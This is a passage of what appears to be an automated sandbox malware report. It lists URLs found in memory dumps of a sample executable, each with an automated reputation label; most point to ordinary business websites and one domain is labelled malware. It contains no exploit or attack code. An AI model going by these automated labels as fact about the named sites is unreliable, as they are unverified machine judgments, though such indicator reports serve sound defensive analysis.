                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          unknown
                                                                                                                                                          https://www.elpro.si/kategorija-izdelka/wika-partner/tlak/pretvorniki-tlaka-wika/EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          unknown
                                                                                                                                                          https://www.elpro.si/kategorija-izdelka/wika-partner/temperatura/prikazovalniki-temperature/EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          unknown
                                                                                                                                                          http://www.elpro.si/wp-content/plugins/magic-tooltips-for-contact-form-7/assets/css/jquery.qtip.min.EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          unknown
                                                                                                                                                          https://www.pwd.org/EwK95WVtzI.exe, 00000000.00000003.1844171845.000000000167F000.00000004.00000020.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1853565854.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871154486.0000000003A50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1907243367.0000000001450000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          unknown
                                                                                                                                                          https://www.elpro.si/kategorija-izdelka/resitve-za/industrija/EwK95WVtzI.exe, 00000000.00000003.1998747633.0000000004980000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          unknown
                                                                                                                                                          http://www.pcgrate.com/wp-content/plugins/woo-rfq-for-woocommerce/gpls_assets/js/gpls_woo_rfq.js?verEwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          unknown
                                                                                                                                                          https://net3.necs.com/pohlfood/site/search?selectview=byclass&amp;queryCol=&amp;terms=pizzaEwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871271742.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1907243367.0000000001450000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://www.elpro.si/avtorji/EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                            unknown
                                                                                                                                                            https://www.elpro.si/kategorija-izdelka/razdelitev-po-standardih-direktivah/2014-34-eu/EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                            unknown
                                                                                                                                                            https://www.elpro.si/kategorija-izdelka/rotronic/tlak-rotronic-merilniki-tlaka/EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                            unknown
                                                                                                                                                            http://www.elpro.si/wp-content/plugins/yith-woocommerce-wishlist/assets/css/jquery.selectBox.css?verEwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                            unknown
                                                                                                                                                            http://www.olras.com/xEwK95WVtzI.exe, 00000000.00000002.2744288397.0000000001613000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                            unknown
                                                                                                                                                            https://net3.necs.com/pohlfood/site/search?selectview=choose&amp;queryCol=class&amp;terms=MediterranEwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871271742.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1907243367.0000000001450000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://pohlfood.com/comments/feed/EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871271742.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1907243367.0000000001450000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              https://www.elpro.si/kategorija-izdelka/wika-partner/tlak/EwK95WVtzI.exe, 00000000.00000003.1998747633.0000000004980000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              https://www.elpro.si/kategorija-izdelka/industrijske-tablice-telefoni-handheld/industrijski-skenerjiEwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              https://www.elpro.si/kategorija-izdelka/merilniki-vlage/rotronic-vlaga-aktivnost-vode-dew-point-moniEwK95WVtzI.exe, 00000000.00000003.1998747633.0000000004980000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              https://www.aevga.com/EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                              unknown
                                                                                                                                                              http://pohlfood.com/wp-content/plugins/real3d-flipbook/js/flipbook.pdfservice.min.js?ver=3.25EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871271742.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1907243367.0000000001450000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
